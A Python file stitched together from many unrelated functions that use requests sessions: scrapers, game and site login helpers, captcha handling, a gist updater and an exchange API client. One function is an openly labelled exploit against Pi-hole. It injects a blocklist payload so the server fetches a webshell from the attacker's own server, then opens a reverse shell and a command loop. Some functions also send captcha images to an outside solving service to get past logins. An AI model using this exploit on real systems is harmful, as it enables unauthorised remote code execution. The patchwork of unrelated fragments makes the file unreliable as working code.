def _connect(url: str, data: str = None, headers: dict = None, auth=None,
             session: requests.Session = __SESSION) -> requests.Response:
    """
    :param url: url
    :type url: :class:`str`
    :param data: data to post
    :type data: :class:`str`
    :param headers: headers to send
    :type headers: :class:`dict` or :class:`None`
    :param auth: the authentication for the session.
    :type auth: :class:`requests.auth.HTTPBasicAuth`
    :param session: the session to connect with, otherwise the default one.
    :type session: :class:`requests.Session`
    :return: the response of the connection
    :rtype: :class:`requests.Response`
    """
    if headers is None:
        headers = dict()
    url = url_fixer(url)
    headers['User-Agent'] = consts.USER_AGENT
    if data is not None:
        sock = session.post(url, data=data, headers=headers, auth=auth)
    else:
        sock = session.get(url, headers=headers, auth=auth)
    return sock
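# Usage sketch for _connect (hypothetical endpoint URL; url_fixer, consts and
# __SESSION are the module-level helpers assumed above). It shows the dispatch
# rule: POST when `data` is given, GET otherwise.
def _demo_connect():
    resp = _connect("https://example.com/api")                    # GET, no data
    resp = _connect("https://example.com/api", data="key=value")  # POST
    return resp.status_code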
def session(self, base_url="http://baseserver"):
    """
    Mount this app on a session object; any request on that session
    whose URL starts with the ``base_url`` prefix is routed to it.
    """
    session = RequestsSession()
    session.mount(prefix=base_url, adapter=RequestWSGIAdapter(self))
    return session
def login(session: requests.Session, account: str, password: str,
          captcha_code=None, save_captcha=False):
    """Login to Mo Online.

    Arguments:
        session {requests.Session} -- requests session.
        account {str} -- game account.
        password {str} -- game password.
        captcha_code {str} -- captcha code.
        save_captcha {bool} -- whether to keep the captcha image.

    Raises:
        LoginError:
            error_type
                server_error: server timeout or error
                account_error: wrong account or password
                captcha_error: wrong captcha code

    Returns:
        [str] -- game login url. (moop)
    """
    page = session.get(url=LOGIN_URL, timeout=TIMEOUT)
    if not isinstance(captcha_code, str):
        get_captcha(session)
        captcha_code = input("input captcha code: ")
    login_data = {
        'loginAccount': account,
        'loginPassword': password,
        'loginCode': captcha_code,
        'contract1': 'on',
        'contract2': 'on',
        'contract3': 'on',
        **csrf_parse(page.text)
    }
    post_login = session.post(url=LOGIN_URL, timeout=TIMEOUT, data=login_data)
    if post_login.url == START_GAME_URL and post_login.status_code == 200:
        _base_index = post_login.text.find('window.location.href') + 24
        return post_login.text[_base_index:
                               post_login.text.find('"', _base_index + 1)]
    elif post_login.text.find("密碼錯誤") > -1:  # "wrong password"
        raise LoginError(error_type='account_error', account=account,
                         message="account or password wrong.")
    elif post_login.text.find("驗證碼輸入不正確") > -1:  # "captcha incorrect"
        raise LoginError(error_type='captcha_error', account=account,
                         message="captcha code error.")
    raise LoginError(error_type='server_error', account=account,
                     message="unexpected login response.")
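# A minimal, hypothetical driver for login(): LOGIN_URL, TIMEOUT, get_captcha
# and LoginError come from the surrounding module; account values are
# placeholders. Passing captcha_code=None makes login() display the captcha
# image and prompt on stdin.
def _demo_login():
    import requests
    with requests.Session() as s:
        try:
            game_url = login(s, account="player1", password="secret")
            print("start game at:", game_url)
        except LoginError as err:
            print("login failed:", err)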
def retrieve(url):
    session = RequestSession()
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'
    }
    request = session.get(url, headers=headers)
    if not request.ok:
        return False
    res = BytesIO()
    res.write(request.content)
    res.seek(0)  # rewind so callers read from the start of the buffer
    return res
def exploit(session: requests.Session) -> None:
    print(f"[+] Got session-cookie: PHPSESSID={session.cookies.get_dict()['PHPSESSID']}")

    # Get the CSRF token from the blocklist settings page
    html = session.get(url=f"{url}settings.php?tab=blocklists", proxies=proxy).text
    soup = BeautifulSoup(html, 'html.parser')
    token = soup.find("input", {'name': 'token'})['value']

    # Stage 1: save a blocklist entry that triggers a connection to our server
    payload = f'http://{get_ip()}# -o ex.php -d "'
    data = {
        'newuserlists': payload,
        'token': token,
        'field': 'adlists',
        'submit': 'saveupdate'
    }
    session.post(url=f"{url}settings.php?tab=blocklists", data=data, proxies=proxy)

    # Set up the HTTP server that serves the webshell
    http = Process(target=setup_http)
    http.daemon = True
    http.start()

    # Trigger access & file write
    for _ in range(2):
        session.get(url=f"{url}scripts/pi-hole/php/gravity.sh.php", proxies=proxy)

    # Verify webshell
    if verify_webshell():
        print("[+] Webshell uploaded successfully!")
        rev_shell()
        try:
            while True:
                cmd = input("cmd> ")
                # exec() here presumably shadows the builtin with a
                # command-execution helper defined elsewhere in the script
                print(exec(cmd))
        except KeyboardInterrupt:
            quit()
    else:
        raise Exception("Webshell not uploaded!")
def get_authentication_data(s: requests.Session, contract_number: str):
    data = s.get(url='http://cn.its.glo-ots.cn/ITS_EXPORT_AUTHENTICATION.asp?contractid={}&op=0'
                 .format(contract_number))
    data.encoding = 'gbk'
    soup = BeautifulSoup(data.text, "lxml")
    data_dict = {}
    info_dict = {}
    cargo_list = []
    tables = soup.find_all('table')
    trs = tables[8].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['目的港'] = tds[0].contents[0].strip()                    # destination port
    info_dict['状态'] = tds[1].find('p').contents[0].strip()            # status
    info_dict['一般原产地证书'] = tds[2].find('p').contents[0].strip()  # general certificate of origin
    info_dict['普惠制原产地证书'] = tds[3].contents[0].strip()          # GSP certificate of origin
    info_dict['认证费用'] = tds[4].contents[0].strip()                  # certification fee
    for idx, tr in enumerate(tables[11].find_all('tr')):
        if idx != 0:  # skip the header row
            tds = tr.find_all('td')
            cargo_dict = {}
            cargo_dict['货号'] = tds[0].find('a').contents[0].strip()  # item number
            cargo_dict['品名'] = tds[1].contents[0].strip()            # product name
            cargo_dict['数量'] = tds[2].contents[0].strip()            # quantity
            cargo_dict['件数'] = tds[3].contents[0].strip()            # package count
            cargo_dict['毛重'] = tds[4].contents[0].strip()            # gross weight
            cargo_list.append(cargo_dict)
    data_dict["货物信息"] = cargo_list  # cargo info
    data_dict['检验程序'] = info_dict   # inspection procedure
    return data_dict
def get_sysconf(s: requests.Session, page: str, act: str, params):
    return s.get(url=sysconf,
                 params=dict({"page": page, "action": act}, **params),
                 verify=False)
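# Sketch of the params merge used by get_sysconf (and the post/sid variants
# below): dict({...}, **params) copies the page/action pair and overlays the
# caller's extra query parameters. `sysconf` is the module-level endpoint URL
# assumed above; the parameter values are placeholders.
def _demo_get_sysconf(s):
    # sends ?page=status&action=get&id=42
    return get_sysconf(s, page="status", act="get", params={"id": "42"})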
def download(self, item):
    """
    Downloads a single file and returns the HTTP response.
    """
    if self.session is None:
        self.session = RequestSession()
    try:
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'
        }
        url = item['url']
        request = self.session.get(url, headers=headers)
        response = {
            'url': url,
            'httpcode': request.status_code,
            'status': request.ok,
            'content-type': request.headers.get('Content-Type')
        }
        if request.ok:
            response['content'] = request.content
        return {'item': item, 'response': response}
    except RequestException as e:
        print('[error]', e)
        return {
            'item': item,
            'response': {
                'status': False,
                'error': e,
                'url': item['url']
            }
        }
def get_captcha(session: requests.Session):
    image_data = session.get(url=CAPTCHA_IMAGE_URL, timeout=TIMEOUT)
    io_file = io.BytesIO(image_data.content)
    image = Image.open(io_file)
    image.show()
    io_file.seek(0)  # rewind: Image.open consumed the buffer
    return io_file
def update_gitee_gist(session: requests.Session, host_content):
    gitee_token = os.getenv("gitee_token")
    gitee_gist_id = os.getenv("gitee_gist_id")
    gist_file_name = os.getenv("gitee_gist_file_name")
    url = "https://gitee.com/api/v5/gists/{}".format(gitee_gist_id)
    headers = {"Content-Type": "application/json"}
    data = {
        "access_token": gitee_token,
        "files": {gist_file_name: {"content": host_content}},
        "public": "true"
    }
    json_data = json.dumps(data)
    try:
        response = session.patch(url, data=json_data, headers=headers, timeout=20)
        if response.status_code == 200:
            print("update gitee gist success")
        else:
            print("update gitee gist fail: {} {}".format(
                response.status_code, response.content))
    except Exception as e:
        traceback.print_exc()  # print_exc() takes no exception argument
        raise Exception(e)
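# Hypothetical setup sketch for update_gitee_gist: the token, gist id and
# file name are read from environment variables, so a caller only supplies
# the session and the new content. The placeholder values are not real.
def _demo_update_gist():
    import os
    import requests
    os.environ.setdefault("gitee_token", "<token>")
    os.environ.setdefault("gitee_gist_id", "<gist-id>")
    os.environ.setdefault("gitee_gist_file_name", "hosts")
    with requests.Session() as s:
        update_gitee_gist(s, "127.0.0.1 localhost")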
def get_recent_news_articles(session: requests.Session) -> List[Dict[str, str]]:
    """
    Fetches the most recent news articles for the logged-in player

    :param session: The requests session initialized by the ComunioSession
    :return: List of article dictionaries with the following attributes:
                - date:    The article's date
                - type:    The type of the article, e.g. 'transfers'
                - content: The article's content
    """
    html = session.get("http://www.comunio.de/team_news.phtml").text
    soup = BeautifulSoup(html, "html.parser")
    article_headers = soup.select(".article_header1") + soup.select(".article_header2")
    article_content = soup.select(".article_content1") + soup.select(".article_content2")
    articles = []
    for header_tag, content_tag in zip(article_headers, article_content):
        header = header_tag.text.strip()
        content = content_tag.text.strip()
        article = {
            "date": header.split(" ", 1)[0],
            "type": header.split(" > ", 1)[1],
            "content": content
        }
        articles.append(article)
    return articles
def fetch_page(*, url: str, session: requests.Session):
    req = session.get(url)
    body = req.text
    if not req.from_cache:
        time.sleep(5)
    interactive_warning = '<title>Interactive Stories Are Temporarily Unavailable</title>'
    while interactive_warning in body:
        sleep_for_url(url)
        cache_backend.delete_url(url)
        req = session.get(url)
        body = req.text
    return body
def check_captcha(s: requests.Session, captcha: str):
    r = s.post("https://pass.changyan.com/api/checkCaptcha",
               data={"t": "normal", "c": captcha})
    return r.json().get("ok")
def apost(asession: requests.Session, url, data=None):
    if data is None:  # avoid a mutable default argument
        data = {}
    burp0_url = buildURL(asession, url, {})
    burp0_cookies = {"ATERNOS_SEC_7bawidcle0t00000": "3uayvfdrudm00000"}
    for cookie in asession.cookies.get_dict():
        if "_SEC_" in cookie:
            burp0_cookies = {cookie: asession.cookies.get(cookie)}
    burp0_headers = {
        "Connection": "close",
        "Accept": "*/*",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": "https://aternos.org",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Referer": "https://aternos.org/go/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7"
    }
    # burp0_data = {
    #     "user": "******",
    #     "password": "******"
    # }
    return asession.post(burp0_url, headers=burp0_headers,
                         cookies=burp0_cookies, data=data)
def post_sysconf(s: requests.Session, page: str, act: str, params, data):
    return s.post(url=sysconf,
                  params=dict({"page": page, "action": act}, **params),
                  data=data,
                  verify=False)
def getInspections(after: datetime, session: requests.Session, headers: dict):
    '''
    Get all inspections modified after the given ISO datetime.
    '''
    query = (f"https://api.safetyculture.io/audits/search"
             f"?field=audit_id&field=modified_at&modified_after={after}Z")
    results = session.get(query, headers=headers)
    return results.json()
def __init__(self):
    super().__init__(None)
    self._status = False  # not running
    self._session = RqSession()  # create the session
    self._session.headers = HEADERS
    self._content = None  # search content
    self._detail_urls = Queue()  # queue of detail-page URLs
    self._stop = False  # whether to stop
def downloader(session: requests.Session, url: str, filename: str, **kwargs):
    with session.get(url, stream=True, **kwargs) as r:
        if r.status_code == 200:
            r.raw.decode_content = True  # transparently decompress gzip/deflate
            with open(filename, "wb") as f:
                shutil.copyfileobj(r.raw, f)
        else:
            raise Exception("Failed to connect")
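# Usage sketch for downloader: stream a large file to disk without loading it
# into memory. The URL and filename are placeholders; extra keyword arguments
# are passed straight through to session.get.
def _demo_downloader():
    import requests
    with requests.Session() as s:
        downloader(s, "https://example.com/archive.zip", "archive.zip", timeout=30)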
def scap(r: requests.Session, image):
    try:
        resp = r.post("https://bili.dev:2233/captcha",
                      json={'image': base64.b64encode(image).decode("utf-8")})
        resp = resp.json()
    except Exception:
        return None
    return resp['message'] if resp and resp["code"] == 0 else None
def get_sysconf_with_sid_header(s: requests.Session, page: str, act: str, params):
    return s.get(url=sysconf,
                 params=dict({"page": page, "action": act}, **params),
                 verify=False,
                 headers={"sid": s.cookies.get("sid")})
async def checkPages(s: requests.Session):
    for a in range(len(urlList)):
        res1 = s.get(url=urlList[a], allow_redirects=False)
        if urlResultlist[a] not in res1.text:
            print(res1.text)
            with open("page.html", 'w', encoding="utf-8") as f:
                f.write(res1.text)
            return False
    return True
def get_locations(s: requests.Session) -> list:
    '''
    Retrieve the latest locations from the API.
    '''
    ims_locations_url = f'https://{env.ims_ip}/api/location_stats/latest_by_asset/?format=json&limit=100000'
    locations = s.get(ims_locations_url, verify=False)
    return locations.json()
async def loadPages(s: requests.Session):
    for a in range(len(urlList)):
        res1 = s.get(urlList[a])
        res = re.search(regexList[a], res1.text).group(1)
        print(urlList[a])
        print(res)
        print("\n\n")  # spacing between entries
        urlResultlist.append(res)
def get_own_player_list(session: requests.Session) -> List[Dict[str, Union[str, int]]]:
    """
    Creates dictionaries modelling the user's current players and returns
    them in a list. The format of these dictionaries is:

        name:     The player's name
        value:    The player's current value
        points:   The player's currently accumulated performance points
        position: The player's position

    :param session: The requests session initialized by the ComunioSession
    :return: A list of the user's players as dictionaries
    """
    player_list = []
    sell_html = session.get("http://www.comunio.de/putOnExchangemarket.phtml")
    on_sale_html = session.get("http://www.comunio.de/exchangemarket.phtml?takeplayeroff_x=22")
    soups = (BeautifulSoup(sell_html.text, "html.parser"),
             BeautifulSoup(on_sale_html.text, "html.parser"))

    for i, soup in enumerate(soups):
        players = soup.select(".tr1") + soup.select(".tr2")
        for player in players:
            attrs = player.select("td")
            if i == 0:  # players not currently on sale
                player_info = {"name": attrs[0].text.strip(),
                               "value": int(attrs[2].text.strip().replace(".", "")),
                               "points": int(attrs[3].text.strip()),
                               "position": attrs[4].text.strip()}
            else:  # players already on the exchange market
                player_info = {"name": attrs[1].text.strip(),
                               "value": int(attrs[4].text.strip().replace(".", "")),
                               "points": int(attrs[5].text.strip()),
                               "position": attrs[7].text.strip()}
            player_list.append(player_info)
    return player_list
def renew(sess_id: str, session: requests.Session, password: str, order_id: str) -> bool:
    url = "https://support.euserv.com/index.iphp"
    headers = {
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/83.0.4103.116 Safari/537.36",
        "Host": "support.euserv.com",
        "origin": "https://support.euserv.com",
        "Referer": "https://support.euserv.com/index.iphp"
    }
    # Step 1: open the contract details
    data = {
        "Submit": "Extend contract",
        "sess_id": sess_id,
        "ord_no": order_id,
        "subaction": "choose_order",
        "choose_order_subaction": "show_contract_details"
    }
    session.post(url, headers=headers, data=data)

    # Step 2: fetch the security-password token
    data = {
        "sess_id": sess_id,
        "subaction": "kc2_security_password_get_token",
        "prefix": "kc2_customer_contract_details_extend_contract_",
        "password": password
    }
    f = session.post(url, headers=headers, data=data)
    f.raise_for_status()
    response = f.json()
    if response["rs"] != "success":
        return False
    token = response["token"]["value"]

    # Step 3: extend the contract term with the token
    data = {
        "sess_id": sess_id,
        "ord_id": order_id,
        "subaction": "kc2_customer_contract_details_extend_contract_term",
        "token": token
    }
    session.post(url, headers=headers, data=data)
    time.sleep(5)
    return True
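# Hypothetical end-to-end sketch for renew(): the EUserv session id, password
# and order number would come from an earlier login step that is not shown
# here; all values below are placeholders.
def _demo_renew():
    import requests
    with requests.Session() as s:
        ok = renew(sess_id="<sess-id>", session=s,
                   password="<password>", order_id="<order-no>")
        print("renewed" if ok else "renewal failed")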
def check_is_student(s: requests.Session) -> bool:
    """Check whether the logged-in user is a student.

    Args:
        s (requests.Session): session

    Returns:
        bool: True if the landing URL identifies a student account
    """
    url = s.get("https://www.zhixue.com/container/container/index/").url
    return "student" in url
def dolike(ses: requests.Session, to_userid: str, type: int = 1):
    data = json.dumps({"from": "1", "toUserId": to_userid, "type": str(type)})
    sign = get_md5_code(data)
    res = ses.post(host + '/api/center/doLike',
                   data={'sign': sign, 'data': data})
    if res.json()['code'] != 200:
        print(res.text)
        raise Exception("doLike failed: code {}".format(res.json()['code']))
def download(url, local_path=None):
    filename = os.path.basename(url)
    local_file_path = os.path.join(tempfile.gettempdir(), filename)
    if local_path is not None and os.path.isdir(local_path):
        local_file_path = os.path.join(local_path, filename)
    session = RequestSession()
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'
    }
    request = session.get(url, headers=headers)
    if not request.ok:
        return False
    with open(local_file_path, 'wb') as fh:
        fh.write(request.content)
    return local_file_path
def getHTMLText(url: str, rssion: requests.Session) -> str:
    resp = None
    try:
        resp = rssion.get(url, headers=PttInfo.headers)
        resp.raise_for_status()
        resp.encoding = resp.apparent_encoding
        return resp.text
    except Exception:
        print("url: " + url)
        if resp is not None:  # the GET itself may have failed
            print("request: " + str(resp.request))
            print("response status: " + str(resp.status_code))
        return "error resp"
def __init__(self, processed_callback, multi=False, bulksize=50,
             stateless=True, state_id=None, verbose=False,
             auto_save_states=False):
    self.__process_callback = processed_callback
    self.multi = multi
    self.bulksize = bulksize
    self.stateless = stateless
    self.__auto_save_states = auto_save_states
    self.session = RequestSession()
    self.stats = {
        'total_images': 0,
        'total_duration': 0,
        'average_duration': 0,
        'average_queue_count': 0,
        'ignored': {'total': 0, 'files': {}},
        'downloads': {
            'total_successes': 0,
            'total_errors': 0,
            'successes': {},
            'errors': {}
        },
        'uploads': {
            'total_successes': 0,
            'total_errors': 0,
            'successes': {},
            'errors': {}
        }
    }
    self.__processes_queue_counts = []
    self.__processes_durations = []
    self.identicals = {}
    if not self.stateless:
        self.state_id = state_id
        if self.state_id is None:
            from uuid import uuid4
            self.state_id = str(uuid4())
        self.states = {}
        self.old_states = {}
    self.verbose = verbose
def validate_session(session: requests.Session) -> bool:
    # Validate by visiting settings; an anonymous user will be redirected
    # to the login page.
    settings_url = "https://www.zhihu.com/settings/profile"
    verify_rsp = session.get(settings_url)
    if verify_rsp.url != settings_url:
        obsolete_session_file = os.path.join(
            os.path.dirname(os.path.abspath(__file__)), SESSION_FILENAME)
        if os.path.exists(obsolete_session_file):
            os.remove(obsolete_session_file)
        raise ValueError("check COOKIE_VALUE in settings.py.")
    return True
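# Usage sketch for validate_session, assuming a session restored from the
# cookie file named by SESSION_FILENAME; a stale session deletes that file
# and raises ValueError.
def _demo_validate():
    import requests
    s = requests.Session()  # would normally carry the saved zhihu cookies
    try:
        validate_session(s)
        print("session still valid")
    except ValueError:
        print("session expired; refresh COOKIE_VALUE in settings.py")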
def _process_request(self, request: Request, session: requests.Session) -> None:
    """
    Send the request to the server and process the result.
    """
    # noinspection PyBroadException
    try:
        request = self.sign(request)
        url = self.make_full_url(request.path)
        response = session.request(
            request.method,
            url,
            headers=request.headers,
            params=request.params,
            data=request.data,
            proxies=self.proxies,
        )
        request.response = response
        status_code = response.status_code
        # Treat any 2xx as success, even though exchanges all use 200.
        # Integer division is required: 299 / 100 == 2.99 would not match.
        if status_code // 100 == 2:
            jsonBody = response.json()
            request.callback(jsonBody, request)
            request.status = RequestStatus.success
        else:
            request.status = RequestStatus.failed
            if request.on_failed:
                request.on_failed(status_code, request)
            else:
                self.on_failed(status_code, request)
    except Exception:  # noqa
        request.status = RequestStatus.error
        t, v, tb = sys.exc_info()
        if request.on_error:
            request.on_error(t, v, tb, request)
        else:
            self.on_error(t, v, tb, request)
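# Minimal sketch of how a request flows through _process_request: on any 2xx
# response the parsed JSON body is handed to the request's callback. The
# Request constructor arguments and the client wiring shown here are
# assumptions about the surrounding client, not its confirmed API.
def _demo_time_callback(json_body, request):
    print("server response:", json_body)

# client.add_request(Request(method="GET", path="/api/v1/time", params={},
#                            data=None, headers={}, callback=_demo_time_callback))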